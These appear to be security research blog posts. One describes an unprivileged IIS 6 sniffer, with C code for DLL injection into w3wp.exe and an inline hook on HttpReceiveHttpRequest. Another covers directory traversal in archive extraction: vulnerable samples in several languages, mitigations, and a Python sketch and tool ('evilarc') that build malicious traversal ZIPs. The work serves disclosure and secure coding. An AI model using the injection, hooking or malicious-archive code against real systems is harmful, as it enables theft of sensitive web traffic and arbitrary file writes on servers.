Facebook has in the last few months really ramped up its security efforts by offering a Bug Bounty program. The program adheres to the principle of responsible disclosure and has been relatively successful, as numerous bugs have been reported and fixed. Unfortunately, third-party plugins are excluded from this program, and since tens of thousands of third party applications integrate into Facebook, this presents many opportunities for the curious attacker. It would be nice to see Facebook allow third-party developers to opt into the bug bounty program, but in the meantime it is a step in the right direction.

ThotCon 0x01

For those who haven’t heard, Greg Ose and I will be presenting at the first annual ThotCon on April 23 in Chicago. If you haven’t gotten your ticket yet, you will need to hurry, as they are almost gone. Our talk is called Forensic Fail: Malware Kombat and will cover some of the failings of digital forensics. We also have a surprise lined up for the end, so if you are in the area you won’t want to miss it.

You can register on the conference website. We hope to see you there.

Unprivileged Sniffing

The standard attack path against a hardened system almost invariably involves escalating privileges locally. Privileged access allows the attacker to do things like access all data on the server, sniff network traffic, and install rootkits or other privileged malware. Typically, one of the goals of host hardening is to limit the damage that an attacker who has gained access to an unprivileged account can do. “Successfully” hardening a web server, for example, involves preventing the account used by the httpd service from modifying the source code of the application it hosts.

Imagine a web server that handles sensitive information, let’s say credit card numbers. The application runs through an interpreter invoked by a web server running as an unprivileged user. No matter how this data is encrypted at rest, if it can be decrypted by the application, an attacker with the ability to invoke an arbitrary process at the same privilege level as the application will be able to recover the data. This is not true, however, of data which is stored as a hash or encrypted using an asymmetric public key where the private key is not present. In those cases an attacker is often forced to escalate local privileges to sniff the data in transit, either via network sniffing or by modifying encryption libraries. Even when data is stored in a retrievable format, especially on hardened systems, recovering this obfuscated data can be a daunting task for an attacker. Many applications now employ a multi-tiered approach which requires a significant amount of time and effort to attack in order to gain access to the critical keys or algorithms.

Given the architecture of Windows servers, however, it is possible, via access to an unprivileged service account such as Network Service, to implement a form of unprivileged sniffer which will monitor sensitive information as it is passed through the target application. This can be implemented in a way which allows an attacker to trivially monitor all data in motion through the application. In the case of a web application this would include any parameters within a request, data returned by the server, or even headers like those used for basic authentication. The method is generic across applications and can be used to sniff encrypted connections.

The unprivileged sniffer doesn’t employ any tactics that are strictly new, and although we haven’t seen this implemented in malware to date, it wouldn’t be surprising if something similar has been done. The implementation I will describe is effective against IIS 6, but similar things could be implemented for other applications (SQL Server and Apache come to mind).

The first challenge in hooking into an IIS worker process or Application Pool (w3wp.exe) is knowing when it will start. A request coming into IIS is handled by the W3SVC service and passed off to an Application Pool via a named pipe. The service will either instantiate a new worker process, passing the pipe name as an argument, or assign the connection to an existing worker. The difficulty is that as the unprivileged worker account we cannot hook into the W3SVC itself, so we must either constantly watch for new instantiations of ‘w3wp.exe’ or have some way of knowing when they start. By monitoring named pipes using the undocumented API ‘NtQueryDirectoryFile’, we can watch for the creation of pipes whose names start with ‘iisipm’. A pipe will be created each time a new worker is initialized, giving us a head start on hooking the new process.

Now that we know a process will be created we can do a standard library injection using code similar to the following to identify it and inject our sniffer. In this code LIBNAME represents the name of the DLL to inject.


HANDLE snapshot, Proc = NULL;
PROCESSENTRY32 entry;
BOOL r;
DWORD TargetPID = 0;
LPVOID LoadLibAddr, RemoteName;

/* Find the PID of the "w3wp.exe" process. */
entry.dwSize = sizeof(PROCESSENTRY32);

if ((snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) != INVALID_HANDLE_VALUE) {
    for (r = Process32First(snapshot, &entry); r; r = Process32Next(snapshot, &entry)) {
        if (strstr(entry.szExeFile, "w3wp.exe")) {
            TargetPID = entry.th32ProcessID;
            break;
        }
    }
    CloseHandle(snapshot);
}

if (!TargetPID) return;

/* Open the process */
if ((Proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, TargetPID)) == NULL) return;

/* Get the address of "LoadLibraryA" to use as our remote thread procedure */
if ((LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA")) == NULL) goto out;

/* Allocate a block of memory within "w3wp.exe" to hold the name of the DLL we are injecting and copy it in */
if ((RemoteName = VirtualAllocEx(Proc, NULL, strlen(LIBNAME) + 1, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE)) == NULL) goto out;

if (!WriteProcessMemory(Proc, RemoteName, LIBNAME, strlen(LIBNAME) + 1, NULL)) goto out;

/* Create a thread within "w3wp.exe" which will load our DLL into memory */
CreateRemoteThread(Proc, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibAddr, RemoteName, 0, NULL);

out:
CloseHandle(Proc);

We now have our library loaded into the address space of the worker process. When this occurs, the entry point of our library will be called. We will use the concept of a trampoline to hook certain calls within the w3wp process. Specifically, IIS uses a library called HTTPAPI for passing HTTP requests and responses around. By hooking into the following calls we can examine requests and responses passed through this worker.

  • HttpReceiveHttpRequest
  • HttpReceiveRequestEntityBody
  • HttpSendHttpResponse
  • HttpSendResponseEntityBody

As an example the following stub shows one way of hooking ‘HttpReceiveHttpRequest’.

/* This type matches the signature of HttpReceiveHttpRequest and will store the address of the real function */

typedef ULONG (WINAPI *HttpReceiveHttpRequestType)(HANDLE, ULONGLONG, ULONG, PHTTP_REQUEST, ULONG, PULONG, LPOVERLAPPED);

HttpReceiveHttpRequestType HttpReceiveHttpRequestSaved;

/* The trampoline structure is used to save both the original 6 bytes of the function we are hooking and the new instructions we replace them with. It must be byte-packed so that it is exactly 6 bytes on x86 */

#pragma pack(push, 1)
typedef struct _trampoline {
    char push;
    void *func;
    char ret;
} Tramp, *PTramp;
#pragma pack(pop)

Tramp HRHR, oldHRHR;
HMODULE lib;
SIZE_T i;

/* Ensure that HTTPAPI.dll has been loaded */
lib = LoadLibraryA("HTTPAPI.dll");

/* Save the address of "HttpReceiveHttpRequest" */
HttpReceiveHttpRequestSaved = (HttpReceiveHttpRequestType)GetProcAddress(lib, "HttpReceiveHttpRequest");

/* 0x68 is the x86 PUSH instruction */
HRHR.push = 0x68;

/* We are pushing the address of our hook */
HRHR.func = (void *)&HttpReceiveHttpRequestHook;

/* 0xC3 is the x86 RETN instruction, which will pop the value we just pushed and jump to that location. This effectively hijacks the flow of execution */
HRHR.ret = (char)0xC3;

/* We then read the original 6 bytes of the HttpReceiveHttpRequest function */
ReadProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &oldHRHR, 6, &i);

/* And replace them with our trampoline code */
WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &HRHR, 6, &i);

We have now replaced the first six bytes of the ‘HttpReceiveHttpRequest’ function mapped within the ‘w3wp.exe’ process, redirecting the flow of execution into our hook procedure. The hook itself can then sniff any data passed through the function, with an implementation similar to the following.

ULONG HttpReceiveHttpRequestHook(HANDLE ReqQueueHandle, ULONGLONG RequestId, ULONG Flags, PHTTP_REQUEST pRequestBuffer, ULONG RequestBufferLength, PULONG pBytesReceived, LPOVERLAPPED pOverlapped) {
    ULONG ret;
    SIZE_T i;

    /* First we restore the first 6 bytes of the real HttpReceiveHttpRequest function to their original value */
    WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &oldHRHR, 6, &i);

    /* We then call the real function and save the return value */
    ret = HttpReceiveHttpRequestSaved(ReqQueueHandle, RequestId, Flags, pRequestBuffer, RequestBufferLength, pBytesReceived, pOverlapped);

    /* At this point all data within the HTTP_REQUEST stored at pRequestBuffer is valid and can be saved to a file or sent out over the network. This data includes the request headers and GET parameters passed with the request */

    /* After we have performed our sniffing operations we write our trampoline back into the real function */
    WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &HRHR, 6, &i);

    /* And return the saved return value */
    return ret;
}

If similar hooks were implemented for each of the functions listed above, all information in and out of IIS could be sniffed in a way that is generic to the web application being used.

Although this implementation is deliberately incomplete, it demonstrates one use case for an unprivileged sniffer. This type of attack is possible in Windows due to the specifics of process creation and how privileges are dropped. It is worth mentioning that a similar attack is generally not possible against comparable Linux services. In Linux, the ability to ptrace a process is controlled by the dumpable flag within the mm member of the process’ task_struct. When privileges are dropped the dumpable flag is unset, and this is inherited when a fork or execve occurs. This prevents the owning user of the resulting process from modifying the process’ execution. Because lower privilege workers in Linux are not newly created processes, but rather inherit their task_struct from the root-owned parent, they are not debuggable by the lower privileged worker account.

We are not currently aware of a way of preventing this type of attack. The Windows privilege structure, and individual privileges such as SeDebugPrivilege, are not designed to prevent access by the owning user. If a fix is possible, it would likely relate to the creation of the worker processes and would require modification of the individual applications. If you have an idea for a fix, please let us know.

Directory Traversal in Archives

By: Greg Ose and Patrick Toomey

I’m sure at the top of everyone’s list of resolutions for the New Year is the ever-forgotten “I will write more secure code”, and it seems that each year this task gets harder. With more complex and abstracted frameworks and APIs, the ways security-related bugs are introduced into a code base have become equally complex and abstracted. Being a few months into 2009, hopefully we can help you catch up on your resolutions by presenting something else to look for when reviewing or writing secure code.

In recent engagements, we have run into a slew of issues focusing around the well-known vulnerability of directory path traversal. As a refresher, this typically involves injecting file path meta-characters into a filename string to reference arbitrary files and usually results in the modification or disclosure of files on the system. For example, a user supplies the filename /../../etc/passwd which is appended to the path /tmp/uploaded_pictures and ends up referencing the password file instead of a file under the intended directory.
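In Python terms, the refresher example plays out as follows; posixpath is used here simply so the Unix path rules apply regardless of the platform this snippet runs on:

```python
import posixpath

base = "/tmp/uploaded_pictures"
user_supplied = "../../etc/passwd"

# Naively joining the two paths keeps the traversal sequences in place...
combined = posixpath.join(base, user_supplied)

# ...and normalizing shows where a file operation would actually land
resolved = posixpath.normpath(combined)  # "/etc/passwd"
```

The file operation ends up referencing /etc/passwd, well outside the intended upload directory.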

We all know, or at least should know, what a typical directory traversal vulnerability and exploit look like. However, we have recently seen these issues manifest themselves in the handling of user-provided archive files instead of file path strings. Typically, these user-provided files are sent via HTTP uploads. Almost all of the common high-level application APIs provide a means, or a third-party library, to handle archive files. Additionally, almost all of these libraries do not check for potential directory path traversal when they perform the extraction of these files. This puts the liability on the developer to check for malicious archives. While file operation calls with a user-controlled variable may be obvious, filenames within user-controlled archives may be the vulnerability that slips by. Developers should not only validate user-supplied file paths for directory traversal, but also check file paths included in archive files. As a note, this type of vulnerability has been mentioned before and is not groundbreaking by any means, but we want to take a detailed look into what to be aware of as a developer and how to test for this during vulnerability assessments.

To get started, let’s take a look at an example provided by Sun themselves (!!!) in a technical article for the package. Code Sample 1 from the article provides their base example for extracting an archive and is shown below.


import java.io.*;
import java.util.zip.*;

public class UnZip {
  static final int BUFFER = 2048;
  public static void main (String argv[]) {
    try {
      BufferedOutputStream dest = null;
      FileInputStream fis = new FileInputStream(argv[0]);
      ZipInputStream zis = new ZipInputStream(
                               new BufferedInputStream(fis));
      ZipEntry entry;
      while((entry = zis.getNextEntry()) != null) {
        System.out.println("Extracting: " + entry);
        int count;
        byte data[] = new byte[BUFFER];
        // write the files to the disk
        FileOutputStream fos = new FileOutputStream(entry.getName());
        dest = new BufferedOutputStream(fos, BUFFER);
        while ((count = zis.read(data, 0, BUFFER)) != -1) {
          dest.write(data, 0, count);
        }
        dest.flush();
        dest.close();
      }
      zis.close();
    } catch(Exception e) {
      e.printStackTrace();
    }
  }
}
We can see where the vulnerability manifests itself in processing each entry of the provided ZIP file:

FileOutputStream fos = new FileOutputStream(entry.getName());

entry is the current ZIP entry being processed and getName() returns the filename stored in that entry. After retrieving this filename, the uncompressed data is written to its value. We can see that by using directory traversal in the filename a malicious user may be able to make arbitrary writes anywhere on the filesystem. Unfortunately, on most platforms, if an attacker can arbitrarily write files they can most likely also get arbitrary code executed on the affected server.

Similar issues exist with a number of ZIP library implementations across various languages. As one might expect, the equivalent Python code is far less verbose. While Python doesn’t provide any sample code, a simple, and vulnerable, ZIP extraction would look as follows:

from zipfile import ZipFile
import sys

zf = ZipFile(sys.argv[1])
zf.extractall()

The extractall method does what one would expect it to do, except that it does not check for directory traversal in the ZIP entries’ file paths. Python also provides equivalent objects for handling tar archives. Interestingly, the tar archive library documentation does make mention of the risk associated with path traversal within archive files. The documentation for the extractall method states:

Warning: Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with “/” or filenames with two dots “..”.

How about PHP? Surely it provides a function for working with ZIP files (what don’t they have a function for?). The PHP manual provides the following example code for extracting ZIP files.

$zip = new ZipArchive;
$res = $zip->open('');
if ($res === TRUE) {
  $zip->extractTo('extracted/');
  $zip->close();
  echo 'ok';
} else {
  echo 'failed, code:' . $res;
}
Sure enough, this code is also vulnerable to file path manipulation within the archive.

What about everyone’s favorite language du jour, Ruby? Ruby itself does not have ZIP file extraction built into the language’s core library. However, rubyzip is a popular third-party library and, like the prior libraries, is also vulnerable to directory traversal. The example below was given in a post by the library’s author as the way to extract a ZIP file and all of its directories:

require 'rubygems'
require 'zip/zipfilesystem'
require 'fileutils'

Zip::ZipFile::open("") { |zf|
  zf.each { |e|
    fpath = File.join(OUTDIR, e.name)
    FileUtils.mkdir_p(File.dirname(fpath))
    zf.extract(e, fpath)
  }
}
Finally, similar to Ruby, the .Net environment does not have ZIP archive handling built into the core library. A quick googling for “.Net zip files” leads to an article on MSDN. In this article, the authors detail this gap in the .Net library and then go on to present a solution. The tools released include a signed DLL for use during development and a set of command-line utility programs that utilize the library. One of these command-line utilities is Unzip.exe. Sure enough, Unzip.exe is vulnerable to path traversal within an archive. No warning is presented, and the archive is extracted without concern for the fully resolved path of the files within the archive.

How do mainstream, standalone compression utilities handle this vulnerability? We tested a large number of archive extraction programs (WinZip, WinRAR, command-line Info-ZIP unzip on Unix, etc.) and noted that all of them either provide a warning when a ZIP file entry contains directory traversal, escape the meta-characters, or just ignore the traversed directory path altogether.

When writing code that interacts with archives, the same precautions used by mainstream extraction utilities must be performed by the developer. As with any user-controlled input, the directory filenames should be validated before being processed by any file operation. The developer should verify that path traversal characters do not occur in any entries within the archive. Similarly, the developer may also leverage utility functions within their language to first determine the fully resolved path before extracting an entry (ex. os.path.normpath(path) in Python).
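A sketch of that advice in Python, where the helper name and the choice to raise ValueError are our own rather than part of the zipfile API, might look like this:

```python
import os
import zipfile

def safe_extractall(zf, dest):
    """Extract a ZipFile only if no entry resolves outside dest."""
    dest = os.path.normpath(dest)
    for name in zf.namelist():
        # Resolve the entry against the destination before any file I/O
        target = os.path.normpath(os.path.join(dest, name))
        if target != dest and not target.startswith(dest + os.sep):
            raise ValueError("traversal in archive entry: %s" % name)
    zf.extractall(dest)
```

Because every entry is resolved and checked before any extraction begins, an archive containing even one traversal entry is rejected outright rather than partially extracted.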

A more drastic mitigation, though perhaps the better long-term solution, would involve modifying these default libraries to work similarly to their standalone application counterparts by default. It is extremely rare to require path traversal characters in a legitimate archive. Perhaps the libraries should be modified to secure the common case, requiring a developer to explicitly request the atypical case. For example, what if the Python ZipFile object changed its default behavior to throw an exception in the presence of file traversal characters? The extractall method signature could be modified as follows:

def extractall(self, path=None, members=None, pwd=None, allow_traverse=False):
By default, allow_traverse is set to False, throwing zipfile.BadZipfile if path traversal characters are encountered. This would provide a secure-by-default configuration for the library while still allowing the existing behavior if necessary. It requires the developer to explicitly request support for path traversal, thus mitigating accidental and insecure usage. This is unlikely to impact existing code, as archives with path traversal characters are not easy to create and it is extremely unlikely a legitimate archive would accidentally include such characters.

During the course of this write-up we grew tired of hand-editing zip archives in a hex-editor to add directory traversal characters. So, we put together a Python script that can be used to generate ZIP archives with path traversal sequences automatically inserted. It can create directories in both Unix and Windows environments for ZIP files (including jar) and tar files with and without compression (gzip or bzip2). You can specify an arbitrary number of directories to traverse and an additional path to append (think var/www or Windows\System32). The full usage follows:

$ ./ --help
Usage: evilarc <input file>

Create archive containing a file with directory traversal

  --version      show program's version number and exit
  -h, --help     show this help message and exit
  -f OUT, --output-file=OUT
                 File to output archive to.  Archive type is
                 based off of file extension.  Supported
                 extensions are zip, jar, tar, tar.bz2, tar.gz,
                 and tgz.  Defaults to
  -d DEPTH, --depth=DEPTH
                 Number of directories to traverse. Defaults to 8.
  -o PLATFORM, --os=PLATFORM
                 OS platform for archive (win|unix). Defaults
                 to win.
  -p PATH, --path=PATH  Path to include in filename after
                 traversal.  Ex:WINDOWS\System32\

The following example shows the file test.txt being added to an archive and extracted to the C:\Windows\System32 directory through the vulnerable Java class we previously discussed:

$ ./ test.txt -p Windows\\System32\\
Creating containing ..\..\..\..\..\..\..\..\Windows\System32\test.txt

$ java javaunzip
Extracting: ..\..\..\..\..\..\..\..\Windows\System32\test.txt

$ ls -al /cygdrive/c/Windows/System32/test.txt
-rwxr-x---+ 1 gose mkgroup-l-d 21 Feb 24 11:52 /cygdrive/c/Windows/System32/test.txt
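The heart of such a generator is small. As a hedged sketch (the function name and arguments here are our own, and this covers only the ZIP case without the script’s other options):

```python
import zipfile

def make_evil_zip(out, payload_path, payload_data, depth=8):
    """Write a ZIP whose single entry climbs `depth` directories up
    before dropping the payload at payload_path."""
    evil_name = "../" * depth + payload_path
    with zipfile.ZipFile(out, "w") as zf:
        # writestr stores the entry name verbatim, traversal and all
        zf.writestr(evil_name, payload_data)
    return evil_name
```

Calling make_evil_zip("evil.zip", "Windows/System32/test.txt", "data") stores a single entry named ../../../../../../../../Windows/System32/test.txt, which a vulnerable extractor will happily write outside its working directory.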

We have made the script available for download here: